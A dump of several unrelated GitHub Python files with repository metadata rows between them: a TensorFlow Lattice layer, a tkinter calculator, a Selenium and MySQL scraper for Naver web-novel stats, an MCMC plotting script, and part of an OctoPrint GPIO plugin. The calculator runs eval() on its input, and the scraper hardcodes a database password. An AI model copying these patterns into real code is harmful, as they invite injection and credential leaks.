print("Time to fit: {:03f}".format(time() - start))
print(result)
localdict = feature.serialize(exclude=['data'])
localdict['framenum'] = i
localdict['framepath'] = os.path.abspath(filepath)
localdict['redchi'] = result.redchi
savedict.append(localdict)
print('Completed frame {}'.format(i))
with open('your_refined.json', 'w') as f:
json.dump(savedict, f)
print('Saved fits')
| laltman2/CNNLorenzMie | experiments/refine.py | refine.py | py | 1,717 | python | en | code | 6 | github-code | 90 |
17437488970 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow import keras
class Aggregation(keras.layers.Layer):
# pyformat: disable
"""Layer which represents an aggregation function.
Calls the model on each of the ragged dimensions and takes the mean.
Input shape:
A list or dictionary with num_input_dims Rank-2 ragged tensors with
shape: (batch_size, ?)
Output shape:
Rank-2 tensor with shape: (batch_size, 1)
Attributes:
- All `__init__ `arguments.
Example:
```python
model = tf.keras.Model(inputs=inputs, outputs=outputs)
layer = tfl.layers.Aggregation(model)
```
"""
# pyformat: enable
def __init__(self, model, **kwargs):
"""initializes an instance of `Aggregation`.
Args:
model: A tf.keras.Model instance.
**kwargs: Other args passed to `tf.keras.layers.Layer` initializer.
Raises:
ValueError: if model is not at `tf.keras.Model` instance.
"""
if not isinstance(model, tf.keras.Model):
raise ValueError('Model must be a tf.keras.Model instance.')
super(Aggregation, self).__init__(**kwargs)
# This flag enables inputs to be Ragged Tensors
self._supports_ragged_inputs = True
self.model = model
def call(self, x):
"""Standard Keras call() method."""
return tf.reduce_mean(tf.ragged.map_flat_values(self.model, x), axis=1)
def get_config(self):
"""Standard Keras get_config() method."""
config = super(Aggregation, self).get_config().copy()
config.update(
{'model': tf.keras.utils.legacy.serialize_keras_object(self.model)}
)
return config
@classmethod
def from_config(cls, config, custom_objects=None):
model = tf.keras.utils.legacy.deserialize_keras_object(
config.pop('model'), custom_objects=custom_objects
)
return cls(model, **config)
| tensorflow/lattice | tensorflow_lattice/python/aggregation_layer.py | aggregation_layer.py | py | 1,912 | python | en | code | 515 | github-code | 90 |
39338352547 | import tkinter as tk
from tkinter import *
# declares a global variable
expression = ""
# functions for numbers, equal, and clearing out
# function for numbers
def btn_click(item):
global expression
# con of string
expression = expression + str(item)
# updates the expression
input_text.set(expression)
# this clears the input field
def clear():
global expression
expression = ""
input_text.set("")
# the equal button
def equal():
global expression
result = str(eval(expression))
input_text.set(result)
expression = ""
# designing UI of the calculator
ui = Tk()
# title
ui.title("Calculator")
# size
ui.geometry("450x750")
# prevents it from being resized
ui.resizable(False, False)
# background color of the calculator
ui.config(bg="Black")
# import StringVar() from tkinter, or use tk.StringVar()
# StringVar() holds string data - used for widgets like entry
input_text = StringVar()
# a box for the top half to display number selected
display = tk.Frame(ui, width=312, height=50, bg="Black", highlightbackground="Black", highlightcolor="Black",
highlightthickness=1)
display.pack(side="top")
# input field inside the frame
display = tk.Entry(display, font=('arial', 30), textvariable=input_text, width=30, bg="black", fg="white", bd=0,
justify='right',)
display.grid(row=0, column=0)
display.pack(padx=50, pady=75)
# frames for each row of buttons
top = tk.Frame(ui, bg="Black")
top.pack(padx=10, pady=1, anchor='center')
# buttons for each different functions + numbers
# lambda = used to define an anonymous functions in python
all_clear = tk.Button(ui, text="AC", bg="grey", width=10, height=5, command=lambda: clear())
all_clear.pack(padx=5, pady=5, in_=top, side='left')
neg_button = tk.Button(ui, text="-", bg="grey", width=10, height=5, command=lambda: btn_click("-"))
neg_button.pack(padx=5, pady=5, in_=top, side='left')
mod_button = tk.Button(ui, text="%", bg="grey", width=10, height=5, command=lambda: btn_click("%"))
mod_button.pack(padx=5, pady=5, in_=top, side='left')
division_button = tk.Button(ui, text="/", bg="orange", width=10, height=5, command=lambda: btn_click("/"))
division_button.pack(padx=5, pady=5, in_=top, side='left')
# frames for each row of buttons
top = tk.Frame(ui, bg="Black")
top.pack(padx=10, pady=1, anchor='center')
seven = tk.Button(ui, text="7", bg="grey", width=10, height=5, command=lambda: btn_click("7"))
seven.pack(padx=5, pady=5, in_=top, side='left')
eight = tk.Button(ui, text="8", bg="grey", width=10, height=5, command=lambda: btn_click("8"))
eight.pack(padx=5, pady=5, in_=top, side='left')
nine = tk.Button(ui, text="9", bg="grey", width=10, height=5, command=lambda: btn_click("9"))
nine.pack(padx=5, pady=5, in_=top, side='left')
multi_button = tk.Button(ui, text="x", bg="orange", width=10, height=5, command=lambda: btn_click("*"))
multi_button.pack(padx=5, pady=5, in_=top, side='left')
# frames for each row of buttons
top = tk.Frame(ui, bg="Black")
top.pack(padx=10, pady=1, anchor='center')
four = tk.Button(ui, text="4", bg="grey", width=10, height=5, command=lambda: btn_click("4"))
four.pack(padx=5, pady=5, in_=top, side='left')
five = tk.Button(ui, text="5", bg="grey", width=10, height=5, command=lambda: btn_click("5"))
five.pack(padx=5, pady=5, in_=top, side='left')
six = tk.Button(ui, text="6", bg="grey", width=10, height=5, command=lambda: btn_click("6"))
six.pack(padx=5, pady=5, in_=top, side='left')
sub_button = tk.Button(ui, text="-", bg="orange", width=10, height=5, command=lambda: btn_click("-"))
sub_button.pack(padx=5, pady=5, in_=top, side='left')
# frames for each row of buttons
top = tk.Frame(ui, bg="Black")
top.pack(padx=10, pady=1, anchor='center')
one = tk.Button(ui, text="1", bg="grey", width=10, height=5, command=lambda: btn_click("1"))
one.pack(padx=5, pady=5, in_=top, side='left')
two = tk.Button(ui, text="2", bg="grey", width=10, height=5, command=lambda: btn_click("2"))
two.pack(padx=5, pady=5, in_=top, side='left')
three = tk.Button(ui, text="3", bg="grey", width=10, height=5, command=lambda: btn_click("3"))
three.pack(padx=5, pady=5, in_=top, side='left')
add_button = tk.Button(ui, text="+", bg="orange", width=10, height=5, command=lambda: btn_click("+"))
add_button.pack(padx=5, pady=5, in_=top, side='left')
# frames for each row of buttons
top = tk.Frame(ui, bg="Black")
top.pack(padx=10, pady=1, anchor='center')
zero = tk.Button(ui, text="0", bg="grey", width=23, height=5, command=lambda: btn_click("0"))
zero.pack(padx=5, pady=5, in_=top, side='left')
period = tk.Button(ui, text=".", bg="grey", width=10, height=5, command=lambda: btn_click("."))
period.pack(padx=5, pady=5, in_=top, side='left')
equals_button = tk.Button(ui, text="=", bg="orange", width=10, height=5, command=lambda: equal())
equals_button.pack(padx=5, pady=5, in_=top, side='left')
# this runs the UI
ui.mainloop()
| notdien/GUI-calculator | main.py | main.py | py | 4,936 | python | en | code | 0 | github-code | 90 |
44212597724 | import re
import requests
import random
import time
import pickle
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from bs4 import BeautifulSoup
from gtts import gTTS
import vlc
from mutagen.mp3 import MP3
import pymysql
import datetime
# DB 생성정보
# create user cho@localhost identified by 'Qwer1234!';
# create user cho@'%' identified by 'Qwer1234!';
# create database cho_db default character set utf8;
# grant all privileges on cho_db.* to 'cho'@'%'
# ####grant all privileges on cho_db.* to 'cho'@'%' identified by 'Qwer1234!';
# DROP TABLE spesial_interview_stat_tb;
# CREATE TABLE `spesial_interview_stat_tb`(
# `num` BIGINT NOT NULL AUTO_INCREMENT PRIMARY KEY,
# `create_date` DATETIME,
# `subject` VARCHAR(128) NOT NULL,
# `score_average` NUMERIC,
# `score_count` NUMERIC,
# `heart_count` NUMERIC,
# `comment_count` NUMERIC,
# `view_count` NUMERIC
# ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
# ALTER TABLE spesial_interview_stat_tb ADD INDEX IDX_s_i_tb_1(create_date ASC);
# ALTER TABLE spesial_interview_stat_tb ADD INDEX IDX_s_i_tb_2(subject ASC);
global mydb
global mycursor
global browser
global view_count_list
global currdate
global novel_url_list
global onlyWrite
def connect_stat_db():
global mydb
global mycursor
mydb = pymysql.connect( host='127.0.0.1', port=5909, user='cho', passwd='Qwer1234!',db='cho_db', charset='utf8')
mycursor = mydb.cursor()
def disconnect_stat_db():
mycursor.close()
mydb.close()
def init_webdriver():
global browser
options = webdriver.ChromeOptions()
options.headless = True
options.add_argument("window-size=1920x1080")
options.add_argument("user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")
browser = webdriver.Chrome(options=options)
browser.implicitly_wait(1)
def clear_webdriver():
global browser
browser.quit()
def scrape_special_interview_view_count():
global browser
global view_count_list
global novel_url_list
novel_url_list=[]
view_count_list=[]
base_url = "https://novel.naver.com/challenge/list?novelId=1042098&order=Oldest&page="
#시작 URL로 변경
page_index=0
novel_index_offset=0
while True:
page_index+=1
url = base_url + str(page_index)
# try:
browser.get(url) # url 로 이동
time.sleep(1)
soup = BeautifulSoup(browser.page_source, "lxml")
novel_list_elements = soup.find("ul", attrs={"class":"list_type2 v3 league_num NE=a:lst"}).find_all("li", attrs={"class":"volumeComment"})
for novel_list_element in novel_list_elements:
view_count=novel_list_element.find_all("span", attrs={"class":"count"})[1].get_text().split(' ')[1].replace(',','').replace('만','0000')
view_count_list.append(view_count)
novel_url=novel_list_element.find("a", attrs={"class":"list_item NPI=a:list"})["href"]
novel_url_list.append("https://novel.naver.com"+novel_url)
try:
nest_page_index=soup.find("div", attrs={"class":"paging NE=a:lst"}).find("a", text=str(page_index+1))
except Exception as err: # 처음 페이지가 없을때
break
if not nest_page_index:
break
def insert_change_stat_info(stat_in_db):
global mydb
global mycursor
global currdate
# print(subject, score_average, score_count, heart_count, view_count)
simple_subject = stat_in_db[0].split('화')
subject_db = simple_subject[0]+"화"
score_average_db=float(stat_in_db[1].strip())
score_count_db=int(stat_in_db[2].replace("명","").strip())
heart_count_db=int(stat_in_db[3])
view_count_db=int(stat_in_db[4])
sql = "INSERT INTO spesial_interview_stat_tb \
(create_date, subject, score_average, score_count, heart_count, view_count) \
VALUES (%s, %s, %s, %s, %s, %s)"
val = (currdate, subject_db, score_average_db, score_count_db, heart_count_db, view_count_db)
# sql = "INSERT INTO spesial_interview_stat_tb \
# (create_date, subject, score_average, score_count, heart_count, view_count) \
# VALUES (%s, %s, %s, %s, %s, %s, %s)"
# val = (currdate, stat_in_db[0], stat_in_db[1], stat_in_db[2], stat_in_db[3], stat_in_db[4])
mycursor.execute(sql, val)
mydb.commit()
def text_to_speech(input_text):
# pass
checkval=len(input_text)
gSound = gTTS( input_text, lang='ko', slow=False)
gSound.save('inputtext.mp3')
media_player = vlc.MediaPlayer()
media=vlc.Media('inputtext.mp3')
audio = MP3("inputtext.mp3")
play_time = audio.info.length
media_player.set_media(media)
media_player.play()
time.sleep(play_time)
def check_change_info(old_total, new_total):
change_info_flag=False
voice_notice=""
subject_db = ""
score_average_db = score_count_db = heart_count_db = comment_count_db = view_count_db = 0
simple_subject = old_total[0].split('화')
subject_db = simple_subject[0]+"화"
voice_notice = "{0}화. ".format( simple_subject[0])
if old_total[1] != new_total[1]:
score_average_db = round( float(new_total[1].strip()) - float(old_total[1].strip()), 3)
voice_notice += ", 평점 {0} 추가, " .format( score_average_db )
change_info_flag = True
if old_total[2] != new_total[2]:
score_count_db = int(new_total[2].replace("명","").strip()) - int(old_total[2].replace("명","").strip())
voice_notice += ", 별점참여 {0} 추가, " .format( score_count_db )
change_info_flag = True
if old_total[3] != new_total[3]:
heart_count_db = int(new_total[3].strip()) - int(old_total[3].strip())
voice_notice += ", 하트 {0} 추가, " .format( heart_count_db )
change_info_flag = True
if old_total[4] != new_total[4]:
view_count_db = int(new_total[4].strip()) - int(old_total[4].strip())
voice_notice += ", 조회수 {0} 추가, " .format( view_count_db )
change_info_flag = True
old_comment_list = old_total[5]
new_comment_list = new_total[5]
old_comment_list_cnt=len(old_comment_list[0])
new_comment_list_cnt=len(new_comment_list[0])
comment_count_db = 0
if new_comment_list_cnt > 0:
loop_comment_index=range(0,new_comment_list_cnt)
for new_comment_index in loop_comment_index:
if old_comment_list_cnt > 0:
continue_boolean=False
for old_comment_index in range(0,old_comment_list_cnt):
if old_comment_list[0][old_comment_index] == new_comment_list[0][new_comment_index]:
try:
if old_comment_list[2][old_comment_index] == new_comment_list[2][new_comment_index]:
continue_boolean=True
break
except IndexError:
continue_boolean=True
continue
if continue_boolean:
continue
try:
voice_notice+="추가 {0}님의 댓글, {1}" .format( new_comment_list[0][new_comment_index], new_comment_list[2][new_comment_index] )
change_info_flag = True
comment_count_db+=1
except IndexError:
voice_notice+="추가 {0}님의 댓글, 클린봇으로 삭제되었습니다." .format( new_comment_list[0][new_comment_index])
change_info_flag = True
comment_count_db+=1
if( change_info_flag ):
print(voice_notice)
text_to_speech(voice_notice)
def scrape_special_interview():
global browser
global view_count_list
global onlyWrite
onlyWrite=0
print("[그와의 은밀한 면접]")
# starturl = "https://novel.naver.com/best/list?novelId=1019899"
starturl = "https://novel.naver.com/challenge/list?novelId=1042098"
#제일 마지막화 제목
browser.get(starturl) # start url 로 이동
soup = BeautifulSoup(browser.page_source, "lxml")
subject_list = soup.find("ul", attrs={"class":"list_type2 v3 league_num NE=a:lst"}).find_all("li",attrs={"class":"volumeComment"})
stop_subject = subject_list[0].find("p", attrs={"class":"subj"}).get_text().strip()
stop_subject = stop_subject[:stop_subject.find('\n')]
if not onlyWrite:
with open('C:/PythonWorkSpace/spesial_interview/spesial_interview_old.pickle', 'rb') as rf:
old_total_info = pickle.load(rf)
total_info=[] # 전체 정보를 저장할 변수
check_index = 0 #루프 횟수
while True:
try:
browser.get(novel_url_list[check_index])
time.sleep(3)
subject = browser.find_element(By.XPATH, "//*[@id='content']/div[1]/div[2]/h2").text
subject = subject[:subject.find('\n')]
score_average = browser.find_element(By.XPATH, "//*[@id='currentStarScore']").text
score_count = browser.find_element(By.XPATH, "//*[@id='currentStarScoreCount']").text
temp_heart_count = browser.find_element(By.XPATH, "//*[@id='content']/div[1]/div[3]/div[2]/div[1]/a/em").text
if temp_heart_count == '좋아요': # 좋아요가 한개도 없을때 보정 작업
heart_count = '0'
else:
heart_count = temp_heart_count
view_count = view_count_list[check_index]
browser.switch_to.frame('nCommentIframe') # iframe 댓글 영역 이동
nick_list = [nick.text for nick in browser.find_elements(By.CLASS_NAME,"u_cbox_nick")]
id_list = [id.text for id in browser.find_elements(By.CLASS_NAME,"u_cbox_id")]
comment_list = [content.text for content in browser.find_elements(By.CLASS_NAME,"u_cbox_contents")]
comment_info = [nick_list, id_list, comment_list]
browser.switch_to.default_content() # iframe 댓글 영역 이동
insert_change_stat_info([subject, score_average, score_count, heart_count, view_count])
# 정보 일괄 취합
single_info=[subject, score_average, score_count, heart_count, view_count, comment_info]
total_info.append(single_info)
if not onlyWrite:
if check_index < len(old_total_info):
check_change_info(old_total_info[check_index], single_info)
else:
print(subject, "는 신규 작품이므로 이후부터 체크됩니다.")
check_index = check_index + 1
if stop_subject == subject:
print('마지막화 입니다. 종료합니다.')
with open('C:/PythonWorkSpace/spesial_interview/spesial_interview_old.pickle', 'wb') as fw:
pickle.dump(total_info, fw)
break
except Exception as err:
print(err)
break
if __name__ == "__main__":
connect_stat_db()
try:
while True:
now = datetime.datetime.now()
currdate = now.strftime('%Y-%m-%d %H:%M:%S')
init_webdriver()
scrape_special_interview_view_count()
scrape_special_interview()
clear_webdriver()
voice_notice='''전 작품 체크가 끝났습니다.'''
print(voice_notice)
time.sleep(300)
except Exception as err:
print(err)
disconnect_stat_db()
| linux1218/spesial_interview | project_web_scraping/spesial_interview_new.py | spesial_interview_new.py | py | 11,855 | python | en | code | 0 | github-code | 90 |
24745471077 | import pickle
import matplotlib.pyplot as plt
import sys, os
import numpy as np
import FormPars
if len(sys.argv) < 2:
print('========== Syntax ===========')
print('python PlotBurnIn.py')
print('<mcmc pickle file>')
print('<path to figure directory (optional)>')
exit()
sPathToPickleMCMC = os.path.abspath(sys.argv[1])
if len(sys.argv) > 2:
sPathToSaveDir = sys.argv[2]
else:
sPathToSaveDir = '/'.join(sPathToPickleMCMC.split('/')[:-2]) + '/Figures/'
MCMC_Name = sPathToPickleMCMC.split('/')[-1].split('.')[0]
############# load MCMC sampler #############
MCMC_Results = pickle.load(open(sPathToPickleMCMC, 'rb'))
sampler = MCMC_Results['sampler']
ndim = sampler.__dict__['dim']
niterations = sampler.__dict__['iterations']
nwalkers = sampler.__dict__['k']
chain = sampler.__dict__['_chain']
TotalEvents = chain.shape[1]
############# get parameter information #############
ParInfo = FormPars.GetParInfo()
ParNames = [ParInfo[i][0] for i in range(ndim)] # parameter names
ParDescs = [ParInfo[i][1] for i in range(ndim)] # parameter description
ParUnits = [ParInfo[i][2] for i in range(ndim)] # parameter units
############# set plot information #############
colors = ['k', 'b','r','g','y','darkblue', 'darkgreen', 'chocolate', 'm', 'gold', 'purple', 'c', 'violet', 'r', 'k', 'darkorange', 'forestgreen', 'lightseagreen', 'rebeccapurple']
Iterations = np.linspace(1, niterations, niterations)
fig, ax = plt.subplots(int(ndim/2. + 0.5), 2, sharex=True, figsize=(20,20))
ax = ax.T.reshape((-1))
############# plot walkers vs. iteration for each parameter #############
for i in range(ndim):
ax[i].plot(Iterations, chain[:, :, i].T, color=colors[i], linewidth=1, alpha=0.1)
# set units for ylabel if exist
if ParUnits[i] != '':
yLabel = ParNames[i] + ' [' + ParUnits[i] + ']'
else:
yLabel = ParNames[i]
ax[i].set_ylabel(yLabel)
# label x-axis for bottom plots
if (i + 1) == len(ax)/2:
ax[i].set_xlabel('Iterations')
ax[i].yaxis.get_major_formatter().set_powerlimits((-3,3))
ax[-1].set_xlabel('Iterations')
plt.savefig(sPathToSaveDir + MCMC_Name + '_BurnIn.png', format='png')
plt.show()
| zachgreene/ElectronLifetime | PythonCodeELMCMC/PlotBurnIn.py | PlotBurnIn.py | py | 2,187 | python | en | code | 0 | github-code | 90 |
11945095465 | # 문자열 재정렬
string = "K1KA5CB7"
stringList = list(string)
stringList.sort()
result = []
number = 0
for i in stringList:
if i.isdigit():
number += int(i)
else:
result.append(i)
result.append(str(number))
print("".join(result))
| EcoFriendlyAppleSu/algo | algorithm/implementation/practice/StringRearrange.py | StringRearrange.py | py | 263 | python | en | code | 0 | github-code | 90 |
13289159264 | class Solution(object):
def topKFrequent(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[int]
"""
result = []
newNums = [str(x) for x in nums]
listOfNum = set(newNums)
numDict = dict.fromkeys(listOfNum, 0)
for num in listOfNum:
numDict[num] = newNums.count(num)
newNumDict = sorted(numDict.items(), key=lambda x: x[1], reverse=True)
topKKeys = [int(x[0]) for x in newNumDict][:k]
result = topKKeys
print(numDict)
return result
| feux-follets/neetcode | 1_arrays_and_hashing/top_k_frequent_elements.py | top_k_frequent_elements.py | py | 588 | python | en | code | 1 | github-code | 90 |
30933348167 | import json
import os
import sys
from pathlib import Path
## ADJUSTABLE VARIABLES ##
# FORCE_DEBUG should be a boolean (True or False, no quotes)
# Note: Environment variables can only store strings. Convert this to string if it has to be an environment variable.
FORCE_DEBUG = True
# HEADER_FILL should be a string array
# The first value is the background color, the second value is the font color, and the third value is the fill type.
# EDIT THIS AS NEEDED
HEADER_FILL = ['4CAF50', '4CAF50', 'solid']
# LOG_DIR should be a string
# This would be in the root directory where this __main__.py file is located.
LOG_DIR = 'logs'
# PROCESSED_DIR is used to set the processed directory that will be created in the found PDF directory.
# This is where the processed Excel files will be stored.
PROCESSED_DIR = 'processed'
# CELL_PHONE should be a string array
# EDIT THIS AS NEEDED
CELL_PHONE = ['Cell', 'Mobile', 'iPhone']
# MAIN_PHONE should be a string array
# EDIT THIS AS NEEDED
MAIN_PHONE = ['Tel', 'Main', 'Home', 'Office', 'Phone', 'Telephone']
## DO NOT CHANGE ANYTHING BELOW THIS LINE ##
# This sets the environment variables for the program.
os.environ['CELL_PHONE'] = json.dumps(CELL_PHONE)
os.environ['FORCE_DEBUG'] = str(FORCE_DEBUG)
os.environ['HEADER_FILL'] = json.dumps(HEADER_FILL)
os.environ['MAIN_PHONE'] = json.dumps(MAIN_PHONE)
os.environ['LOG_DIR'] = str(LOG_DIR)
os.environ['PROCESSED_DIR'] = str(PROCESSED_DIR)
os.environ['TK_SILENCE_DEPRECATION'] = '1'
# This sets the root directory to the parent directory of this __main__.py file.
current_path = Path(__file__).resolve()
parent_path = current_path.parent.parent
sys.path.append(str(parent_path))
# This is the auto-start for the program.
if __name__ == "__main__":
from core.process import batch_convert
from core.filer import select_folder
os.system('cls' if os.name == 'nt' else 'clear')
batch_convert(select_folder())
| AznIronMan/invoice-pdf-to-excel-batch-converter | __main__.py | __main__.py | py | 1,929 | python | en | code | 0 | github-code | 90 |
18924620575 | # """Receive messages over from RabbitMQ and send them over the websocket."""
# import pika
# connection = pika.BlockingConnection(
# pika.ConnectionParameters(host='localhost')
# )
# channel = connection.channel()
# channel.exchange_declare(
# exchange='fe662fd9de834fc', exchange_type='fanout'
# )
# # exclusive means the queue should be deleted once the connection is closed
# result = channel.queue_declare(queue="", exclusive=True)
# # result = channel.queue_declare(queue="")
# queue_name = '' # random queue name generated by RabbitMQ
# # print('queue_name:', queue_name)
# channel.queue_bind(exchange='fe662fd9de834fc', queue=queue_name)
# # print('listening for messages...')
# # x = channel.consume(queue_name)
# # print('channel.consume:', [x])
# # for item, item2 in channel.consume(queue_name):
# # print(item)
# # while True:
# # print('inside while')
# # for method_frame, _, body in channel.consume(queue_name):
# # print('inside for loop')
# # try:
# # print(body)
# # except OSError as error:
# # print(error)
# # else:
# # channel.basic_ack(method_frame.delivery_tag)
# for method_frame, properties, body in channel.consume(queue_name):
# # Display the message parts
# print(method_frame)
# print(properties)
# print(body)
# # Acknowledge the message
# channel.basic_ack(method_frame.delivery_tag)
# # Escape out of the loop after 10 messages
# if method_frame.delivery_tag == 10:
# break
# # Cancel the consumer and return any pending messages
# requeued_messages = channel.cancel()
# print('Requeued %i messages' % requeued_messages)
# # Close the channel and the connection
# channel.close()
# connection.close()
#################################################### AGAIN #############################################
"""Receive messages over from RabbitMQ and send them over the websocket."""
import sys
import pika
import uwsgi
def application(env, start_response):
print('testing')
"""Setup the Websocket Server and read messages off the queue."""
connection = pika.BlockingConnection(
pika.ConnectionParameters(host='localhost')
)
print('connection:', connection)
channel = connection.channel()
exchange = env['PATH_INFO'].replace('/', '')
channel.exchange_declare(
exchange=exchange, exchange_type='fanout'
)
# exclusive means the queue should be deleted once the connection is closed
result = channel.queue_declare(queue='', exclusive=True)
queue_name = result.method.queue # random queue name generated by RabbitMQ
channel.queue_bind(exchange=exchange, queue=queue_name)
uwsgi.websocket_handshake(
env['HTTP_SEC_WEBSOCKET_KEY'],
env.get('HTTP_ORIGIN', '')
)
def keepalive():
"""Keep the websocket connection alive (called every 30 seconds)."""
print('PING/PONG...')
try:
uwsgi.websocket_recv()
# connection.add_timeout(30, keepalive)
connection.call_later(30, keepalive)
except OSError as error:
print('here is the problem')
connection.close()
print(error)
sys.exit(1) # Kill process and force uWSGI to Respawn
keepalive()
while True:
for method_frame, _, body in channel.consume(queue_name):
try:
uwsgi.websocket_send(body)
except OSError as error:
print(error)
sys.exit(1)
else:
# acknowledge the message
channel.basic_ack(method_frame.delivery_tag)
####################################### websocket after uwsgi installation #################################
| Prodip007/realtime_chat_app | websocket.py | websocket.py | py | 3,827 | python | en | code | 0 | github-code | 90 |
25091128159 | # coding=utf-8
from __future__ import absolute_import
import octoprint.plugin
import octoprint.printer
from octoprint.util import RepeatedTimer
from octoprint.events import Events
import pigpio
# Main class used to interface with pigpio
class OctoPiBoxControl:
def __init__(self, parent, printer_pin, spare_pin, printer_button_pin, spare_button_pin, debounce, powercallbackfunction):
self._parent = parent
self._pi = pigpio.pi()
self._powercallbackfunction = powercallbackfunction
self._common_init(printer_pin, spare_pin, printer_button_pin, spare_button_pin, debounce)
self._powercallback = self._pi.callback(self._printer_pin, pigpio.EITHER_EDGE, self._powercallbackfunction)
self._printerbuttoncallback = self._pi.callback(self._printer_button_pin, pigpio.FALLING_EDGE, self._buttoncallbackfunction)
self._sparebuttoncallback = self._pi.callback(self._spare_button_pin, pigpio.FALLING_EDGE, self._buttoncallbackfunction)
self._inited = True
def _common_init(self, printer_pin, spare_pin, printer_button_pin, spare_button_pin, debounce):
self._printer_pin = printer_pin
self._spare_pin = spare_pin
self._pi.set_mode(self._printer_pin, pigpio.OUTPUT)
self._pi.set_mode(self._spare_pin, pigpio.OUTPUT)
self._printer_button_pin = printer_button_pin
self._spare_button_pin = spare_button_pin
self._pi.set_mode(self._printer_button_pin, pigpio.INPUT)
self._pi.set_pull_up_down(self._printer_button_pin, pigpio.PUD_UP)
filter_error = self._pi.set_glitch_filter(self._printer_button_pin, debounce)
if filter_error != 0:
self._parent.logger.info("Glitch filter error. Pin: {}, Debounce: {}, Error: {}.".format(self._printer_button_pin, debounce, filter_error))
self._pi.set_mode(self._spare_button_pin, pigpio.INPUT)
self._pi.set_pull_up_down(self._spare_button_pin, pigpio.PUD_UP)
filter_error = self._pi.set_glitch_filter(self._spare_button_pin, debounce)
if filter_error != 0:
self._parent.logger.info("Glitch filter error. Pin: {}, Debounce: {}, Error: {}.".format(self._spare_button_pin, debounce, filter_error))
def _buttoncallbackfunction(self, gpio, level, tick):
if gpio == self._printer_button_pin:
if self._pi.read(self._printer_pin) == 1:
self._pi.write(self._printer_pin, 0)
else:
self._pi.write(self._printer_pin, 1)
elif gpio == self._spare_button_pin:
if self._pi.read(self._spare_pin) == 1:
self._pi.write(self._spare_pin, 0)
else:
self._pi.write(self._spare_pin, 1)
def restart(self, printer_pin, spare_pin, printer_button_pin, spare_button_pin, debounce):
self._powercallback.cancel()
self._printerbuttoncallback.cancel()
self._sparebuttoncallback.cancel()
self._common_init(printer_pin, spare_pin, printer_button_pin, spare_button_pin, debounce)
self._powercallback = self._pi.callback(self._printer_pin, pigpio.EITHER_EDGE, self._powercallbackfunction)
self._printerbuttoncallback = self._pi.callback(self._printer_button_pin, pigpio.FALLING_EDGE, self._buttoncallbackfunction)
self._sparebuttoncallback = self._pi.callback(self._spare_button_pin, pigpio.FALLING_EDGE, self._buttoncallbackfunction)
def init_status_LED(self, red_pin, green_pin, blue_pin):
self._status_red_pin = red_pin
self._status_green_pin = green_pin
self._status_blue_pin = blue_pin
self.clear_status_LED()
self._status_LED_colors = {
"RED": 1<<self._status_red_pin,
"GREEN": 1<<self._status_green_pin,
"BLUE": 1<<self._status_blue_pin,
"YELLOW": (1<<self._status_red_pin)+(1<<self._status_green_pin),
"MAGENTA": (1<<self._status_red_pin)+(1<<self._status_blue_pin),
"CYAN": (1<<self._status_blue_pin)+(1<<self._status_green_pin),
"WHITE": (1<<self._status_red_pin)+(1<<self._status_green_pin)+(1<<self._status_blue_pin),
"OFF": 0
}
def restart_status_LED(self, red_pin, green_pin, blue_pin):
old_status_LED_state = self._status_LED_state;
self.init_status_LED( red_pin, green_pin, blue_pin)
self.set_status_LED_color( old_status_LED_state[0], old_status_LED_state[1], old_status_LED_state[2])
def clear_status_LED(self):
self._pi.wave_tx_stop()
self._pi.wave_clear()
self.pin_off(self._status_red_pin)
self.pin_off(self._status_green_pin)
self.pin_off(self._status_blue_pin)
self._status_LED_state = [ "OFF", "OFF", "OFF"]
def set_status_LED_color(self, color1, color2, blink_rate):
blink_flash = []
if blink_rate =="FAST":
blink_ms = 100000
elif blink_rate == "SLOW":
blink_ms = 500000
else:
blink_ms = 1000000
color2 = color1
blink_rate = "OFF"
step1_on_pins = self._status_LED_colors[color1]
step1_off_pins = self._status_LED_colors[color1] ^ self._status_LED_colors["WHITE"]
step2_on_pins = self._status_LED_colors[color2]
step2_off_pins = self._status_LED_colors[color2] ^ self._status_LED_colors["WHITE"]
blink_flash.append(pigpio.pulse(step1_on_pins,step1_off_pins,blink_ms))
blink_flash.append(pigpio.pulse(step2_on_pins,step2_off_pins,blink_ms))
self._pi.wave_add_generic(blink_flash)
self._status_LED_wave = self._pi.wave_create()
self._pi.wave_send_repeat(self._status_LED_wave)
self._status_LED_state = [ color1, color2, blink_rate]
def pin_on( self, pin):
self._pi.write( pin, 1)
def pin_off( self, pin):
self._pi.write( pin, 0)
def pin_value( self, pin):
return self._pi.read( pin)
def cancel(self):
if self._inited:
self._inited = False
self._powercallback.cancel()
self._printerbuttoncallback.cancel()
self._sparebuttoncallback.cancel()
self._pi.stop()
class OctoPiBoxPlugin(octoprint.plugin.TemplatePlugin,
octoprint.plugin.AssetPlugin,
octoprint.plugin.SimpleApiPlugin,
octoprint.plugin.EventHandlerPlugin,
octoprint.plugin.SettingsPlugin,
octoprint.plugin.StartupPlugin):
def get_settings_defaults(self):
return dict(
enabled=False,
timer_seconds=600,
printer_pin=17,
spare_pin=4,
printer_button_pin=6,
printer_button_enable_pin=18,
spare_button_pin=5,
spare_button_enable_pin=27,
button_debounce=200,
status_red_pin=22,
status_green_pin=23,
status_blue_pin=24 )
def on_settings_save(self, data):
octoprint.plugin.SettingsPlugin.on_settings_save(self, data)
self._load_settings()
self._octopibox.restart( self._printer_pin, self._spare_pin, self._printer_button_pin, self._spare_button_pin, self._button_debounce)
self._octopibox.restart_status_LED(self._status_red_pin, self._status_green_pin, self._status_blue_pin)
def on_after_startup(self):
self._timeout_value = None
self._timer = None
self._load_settings()
self._octopibox = OctoPiBoxControl(self, self._printer_pin, self._spare_pin, self._printer_button_pin, self._spare_button_pin, self._button_debounce, self._powercallbackfunction)
self._update_power_status()
self._octopibox.pin_on(self._printer_button_enable_pin)
self._octopibox.pin_on(self._spare_button_enable_pin)
self._octopibox.init_status_LED(self._status_red_pin, self._status_green_pin, self._status_blue_pin)
self._set_status_LED("DISCONNECTED")
def on_shutdown(self):
self._octopibox.pin_off(self._printer_button_enable_pin)
self._octopibox.pin_off(self._spare_button_enable_pin)
self._octopibox.clear_status_LED()
self._octopibox.cancel()
def get_assets(self):
return dict(js=["js/octopibox.js"])
def get_template_configs(self):
